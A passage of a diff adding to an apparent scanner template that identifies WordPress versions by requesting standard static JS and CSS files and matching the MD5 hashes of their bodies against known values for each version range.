5.4 - 5.4.4 + dsl: + - "(\"8716957bb6d1b8fa50784c1c106a3eee\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"46cfbd1159b79fe5d623a7c4d69a215d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3366fcfca15614a0632efa733534acd\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-widgets.min.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"038311fc7ba902f635d38d5856e4bd5f\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"06e1b9a8b892c70e1c85d6e71a818042\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"76e8fb3ef4bfc708d61dc8d384d15741\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"05121399e2e350d408b130348c895376\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"4238613e5d0aac83303ec318675cb1f6\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"8969a60a3f0c741d9afea447d86d953d\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"ef95bf9c8588420084c724b541ec9fa0\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"04051a3d44556bfa47c141f3dbbcf574\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"e4253b068d2423298be9024de455ce7a\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"5f456c32cef0c2d26594029014e40121\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"2724ee570a2716c8a7ad0436cb541e7c\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6da061fdd986c81610bab6ce0da32829\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"23e2b245228cfee7192b5a3fe31c0c91\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ffd7aec63852caff436bc285577ecfa3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"5e266e3c53ef66ec3fb3b5056f8b2089\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"41d27e52426e99a7d3266032ee77e1a6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"af50c512cb7c67e0ed118e63c7453e4a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/js/customize-widgets.js" + matchers: + - type: dsl + name: 4.8 - 4.8.15 + dsl: + - "(\"fd98bf4be88830825dc122dd0175408e\" == md5(body))" + - type: dsl + name: 4.7 - 4.7.19 + dsl: + - "(\"da08d3e88ee6525511da0ca1518fef08\" == md5(body))" + - type: dsl + name: 4.6 - 4.6.20 + dsl: + - "(\"0aeb0d45bad4619ea1eaa727f841a356\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ed7f5302d5bae6a9b6cd5a4d43bf78a9\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"2a2b605aaa66b094f21ccad9f81f6967\" == md5(body))" + - type: dsl + name: 4.3 - 4.3.25 + dsl: + - "(\"abb5c6059429946e6df1524a068934ac\" == md5(body))" + - type: dsl + name: 4.2 - 4.2.29 + dsl: + - "(\"07f1519a2a074eb51cce3ec5cb9810d5\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"7850d87d05e8fce2ef72aa1dd954dc63\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"30816d081b666a1ac06ccca7bd335458\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"ac59c76760d66a4135e7c66862b29de3\" == md5(body))" + - type: dsl + name: 4.9 - 5.0.11 + dsl: + - "(\"e92d16056260b9b00ff62ba8cf8ac956\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"1138fc4ff0186ab65c201c1406c5488c\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bc8ac6899320067cd086f03667306ecf\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"2538bc7069ff25eba18dad8e31909458\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"9397c78bbf00b486338b2b41d0749790\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f9f2d84bc27487c539cb01d6daad844b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"d11098c05c2c0c794985feecc744d761\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/css/jquery-ui-dialog-rtl.css" + matchers: + - type: dsl + name: 4.5 - 4.8.15 + dsl: + - "(\"10939ff6a3629fba80e30e2e7c526901\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"f4012995712fc1a153c6be91b0793944\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"81df1614adc93799fc9fd6b4b81c4633\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"c28f6757fb9b072ed4ec796a96321e67\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"094685fe088942cb4b6c7dc87baea22f\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"4022062aa680d97c19101657ee855ab4\" == md5(body))" + - type: dsl + name: 3.8 - 3.8.35 + dsl: + - "(\"f805ee14b012822046c39857720dada6\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"927ba792f9f6603f5f8906f6084d50a6\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"61d8a3d3a6d658c14b3af6df9867c814\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c6a6c86e7744eb9a44a85c796a2ee495\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"eeabb4ac70cad56aa0cadcd62a03d1af\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"61f6e02f97dc44c4e4f40edb42eff799\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ab51971b54ae780e5f7c6435241f384a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"e845c325df4406c4f802e9a91156e27f\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"f330e24b85f0fa9184d3ce6ab3be05f3\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-admin/css/revisions-rtl.css" + matchers: + - type: dsl + name: 4.6 - 4.8.15 + dsl: + - "(\"d2bb91a5e175182fd98b92423245b886\" == md5(body))" + - type: dsl + name: 4.5 - 4.5.23 + dsl: + - "(\"ab5cf43a981c0b4dcf4ca2812302dc6d\" == md5(body))" + - type: dsl + name: 4.4 - 4.4.24 + dsl: + - "(\"34105bf7fc640687204120141bae58c9\" == md5(body))" + - type: dsl + name: 4.2 - 4.3.25 + dsl: + - "(\"cc328e9ddbef2ef2c495786078ff612a\" == md5(body))" + - type: dsl + name: 4.1 - 4.1.32 + dsl: + - "(\"376c100428103201b7109877a4afebae\" == md5(body))" + - type: dsl + name: 4.0 - 4.0.32 + dsl: + - "(\"48e4569b0d88ef4dc74f9fab6949dca3\" == md5(body))" + - type: dsl + name: 3.9 - 3.9.33 + dsl: + - "(\"cc920c884e073e24a57c407bf3f3e9dc\" == md5(body))" + - type: dsl + name: 4.9 - 4.9.16 + dsl: + - "(\"619351c3cdeabdd4ee466e303fade708\" == md5(body))" + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"680ce200631f3e5cea718914a27f2b20\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"396d215094f1db66ef590df9ad2b58ef\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e5fdc24406fc3ac9f77cd9fdd04efde7\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"14180fbee1fff1db3412989150c0443b\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c851fc6fbe4274e4e2bf73b2100a2f96\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"cabcd80e41e666e442604997c371fde5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4d39482cc996c858ca9d2a1bdf67e31a\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/redux-routine.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9edcaa09dfed88e54fbca308bfd5bd30\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"c16dec7246230269b58a03a97307c259\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7a44fe509e3d08f766318638d81fa55d\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8923ea20eee433c28a5d36f3e07dd5a5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"0b2140c841b390907f4b88653b85bd22\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c8c2c6241f51ea5d30d1bbeb3505596a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"7066d794b635c1942e8eb7f239f1ffbc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/deprecated.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9d288327c3cc35f46ee387ac35ce33d2\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"2d6c78a8d8b0ff36f60a59959389ea06\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"bb93233b0856b933d5fed37eed889fc6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"6b4d9b1bb83a32e0584a2d96813914d4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"806f3624fe3764b82839575ba0d78215\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"8bd3f05802ff45dbb7caefe74ca9ac19\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"15d004e2a497bbb3415df4841ee3c287\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/html-entities.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6bc5679d9554f610fa802a700e4d2bb0\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"add6f47cfd2143dc9b8ce1cf9d61fa1d\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e83cc08139f59d9c7b2a844d0f157ae6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"926549c2345d841c4e9aa846b47faf66\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"704aa3f780a4be1c5e1cdec6d12ebd58\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"5e372785534afd708ecd06137104fd7a\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3d019746602830edc76606593c6e78cb\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/html-entities.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"5653e616ff072597049a986e94d1893d\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"17a814289573e3266ce50763ba3d96e9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4e1093a0eb3233815ff119a59aa3da12\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f9ac946bd43269e5d0096b2885a452c4\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"ab30525b5a3d41679c37ceb0391da9b2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c3460934c084a6f5ad1d6067ef4cf601\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"24ba24df2ddcd1a3ece0d53120599d70\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/redux-routine.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a6f2946ff5131fb4149a5e31c1ef1620\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0cd45abb1d29b859766855e38ae523a6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"7afef25c194892b0cd2daa36dfcdcf2f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"330b275564eb0285afa4e176f92db068\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cbf969c81590775351bdf3cbdb23dd8c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c8f64648dc07f6d88806eecf3f1d9171\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"265e120fcc08fd1d71c00b054c2ad6b7\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom-ready.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"9cdf2bc4e52829d46923c46a0c51b3d8\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"afeaf9138fd850772f230e0a45c88b17\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"362658e6685350fbd7085f492d41d2f0\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"23250a9a6c2af1c80138657bc6580c75\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"cac6d5949b7c62e50ef4796c14190413\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"3bacceecaca0f8a589dc42aa0b20bc4b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"623e83c4d16c6e8b4cbfc39fad5eb250\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0ddf6ee2668f5c4bd3c1d2d6cab397b4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"0fd621a526a3a22c990811e7f2452d00\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"e6344716ad60939b279e71b39177359a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5b6f24bca1ae714a09544545ecfa0591\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"62ad08977c7726bdecc27a2c5aae90aa\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"91a430c2d47f62111ad1dcef49602378\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"697dc948d7154a4de8dc89ff1eedc666\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/compose.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"d8938753827f30dbd34f1383cd339fff\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"3ec226880c9c7b212bea4e6b28bef494\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"48303ce765732dd6dec6002e9fb6c2b6\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"98dfd710199c77e9af13f78f26aa2ec9\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"91b64fc6a91c5a07074f910510359d7a\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"c011e24785102d27ae0303584fbd7f61\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c184f3a2648f4987470720f06836ed95\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/notices.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"17eeb174de4dc2cbbab3f4df5033d860\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"deb21fd1f49c4b7273ed16e27d1bdfb6\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"57ec282267670a8099098c610c266afe\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"87401eac0344e7ccccf68ae898454158\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"76bbcc43a04f458c5de0bcdda3b6b2d2\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ca0f216ae346da85031c47117c5110fd\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6347a5cc8ba70c6c00153843d0fe33c8\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/notices.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a97eec74d9c0c50bf12be932ba1cc303\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"cb9b574dc9c6e136ef09ffffa8866b67\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"57f535968b993b74aaee4b2d6fc6b465\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5f1bee3c68fcb07418306a2010736746\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"15c08b66b7ff4019c5402d3d897ad52f\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"b164f09a93d3c5f52db6a7c6de3badb2\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6b507c26a7c8df25e48ab5c68124fda5\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/is-shallow-equal.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6f7824784191e6d2ce34292fd3b000af\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4784dae40cdab3b3843ba1d7f8604705\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"648aa419fdf18a5ab737dbbcd83c4201\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8a86cb6d7546fd3f89a1f5109c476a88\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"c3d623f7027e378ad1acb574cc1eb2e8\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"6f786f55902f42d508158386097b0e7d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"3ced4b8cb966fdeb10870053a7158eca\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/shortcode.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"40ed11fa6412995d2b8ec4668c512957\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"8abc986b209c75fe69057f95edc3df78\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"9fd866d09fc09024aac82a01af9c2b04\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"e096abf3375c18cd3c6842e92473d413\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"bc0717f0b100c9a56ae85fd646445118\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"689da769b1b1e825af1aed70cf3ac27e\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"0c4bc0b7e6a7ee652d67338ee99b323c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/shortcode.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"a78dedde748a70dc816381eefe608b72\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"70c91757d9cbf18b992d6d42f463ff7f\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"4cc94e39247daee4a2000aa3503ff215\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ac3c48115c0205965fc697211684458d\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"085c0f540b7b3e70c084e4070b5b1b63\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"4f5a03618073955d601159a6331ceaa6\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"27f796c850d855e7a672386faa79605f\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/wordcount.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"6cbedf2a939d33d895dca7b7a41ce749\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"761f62febb42875b72bc681607e28c49\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ef5f88e073dfcb14615a7037ebd14d5a\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f3719a4599c7a08452fc41ade441733a\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"1f80397cdd7cb373f7b8bf278857fabb\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f20f637e974b45fb265d1d442f2a96cf\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"6cd42d81392ca9a1275e5929b219cb3e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/plugins.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"8b7c6306e6af8cc0a9c0976463e72291\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"4e4cafec091c6f0f0b05f94b9bce2344\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"16c85d6dab8967f3ba89b82bfbd64b9c\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"5c33e1efc8af44769e3d823c939e08ab\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"dfa7cb95b973bebb10f975b2c1143880\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"d68b321a54cbc9d93cb151250f4c551b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"b3a531b04ae8c7a60aa0844b668d2d3e\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/compose.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"84a24df5fd7511a645e0cc57c571a25e\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"39c3ea51be78c24e6b576cd61f9cfc15\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"45a96c9d47bae98f108e64e2b2a66270\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"90a33c0e9b6ef96958972ca75e65f7bb\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"a302e6d75222f9aa699a02cf71f9d7b3\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"dce767e630974837137c498073100cc5\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"edc09213e8efe783bc66b3b0f7cc4e9c\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/token-list.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"0d97e2a44480fb98f1b04861ae5afc6b\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"867f84b6f025f1123314735f577dc382\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"42ad764acc204932657d4a003ba53c9f\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"1a954120fc762886e2f75c39f83186c5\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"63fb45908530ce527b962cc621b05230\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"9961c5f25ac509cf7cb40e68468841e3\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"4a5239779fc4eca6d020f55604ab0c47\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/plugins.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"cf2c44c23fcccdac64b0f533764e7a57\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"6822b991e921f7b612c7f1561c8aecfe\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"82268e20e6668545503caccea9e48fe2\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"be44053c6cf3cf00096ca0f61d1054d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"733acdbecefa13189f9646eb0b7ea527\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"f09ad846838e615fd9a379d3ff329c3b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"01651f0a9c050441e177a705582f10ee\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/token-list.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"aa95d2cbba56cee9e4c478aae1b495c5\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"9cc3df074bb2ee5a0f3ce49aff4d493e\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ba25522bb908454e432fcb29b1992578\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"94af1e6e3c4a621d920bd15056ecd6df\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"61fce867969f5649b390d339b8fcc48c\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"fdff31d347d9aee423ea3a5b8f776b7b\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"9d837b1c5a73f565fe3c241cfeb7dfcc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/escape-html.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"57fb61bedd534ef3dd8c47e40db28211\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"77e523fe8f66de596d646ebd6c3e8ca9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"495df404bcf10126197c0d6635ca9a07\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"ed967d411b4d74de9d0d6a6f586c74d3\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"7b007fb74b92764d1fc06ae511e66d06\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"ebefa1eab8a9bc27cf54d72ab0bb6c6d\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"543fde0978b47e7bdae1acd97bf054bc\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/deprecated.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"98bad6a83bd5da218b2d35691f497566\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"5de3b6d2f9eac464561dd8b54ed55cf7\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"762e5549e126269285769457c2bb3ddb\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"f1a701ab0a84540fc6bccca46aa242d2\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"18322782d09be581a034f3ab97243810\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + dsl: + - "(\"daad3a5aa907c98228160c9289660f55\" == md5(body))" + - type: dsl + name: 5.6 + dsl: + - "(\"c964eebe5839814c08c3fb26d951ca26\" == md5(body))" + - method: GET + path: + - "{{BaseURL}}/wp-includes/js/dist/dom-ready.min.js" + matchers: + - type: dsl + name: 5.0 - 5.0.11 + dsl: + - "(\"b5c1330c5b03e42ea6bcfa6df3fac8c4\" == md5(body))" + - type: dsl + name: 5.1 - 5.1.8 + dsl: + - "(\"b7059c3d8234362ea1acdf250099a7a9\" == md5(body))" + - type: dsl + name: 5.2 - 5.2.9 + dsl: + - "(\"ef19702e3c41e2b060de992a2bd2dd66\" == md5(body))" + - type: dsl + name: 5.3 - 5.3.6 + dsl: + - "(\"8825521d390213ffb919cafb95ca64e7\" == md5(body))" + - type: dsl + name: 5.4 - 5.4.4 + dsl: + - "(\"edd45ba6b7e8ecd18d3928e188372a32\" == md5(body))" + - type: dsl + name: 5.5 - 5.5.3 + 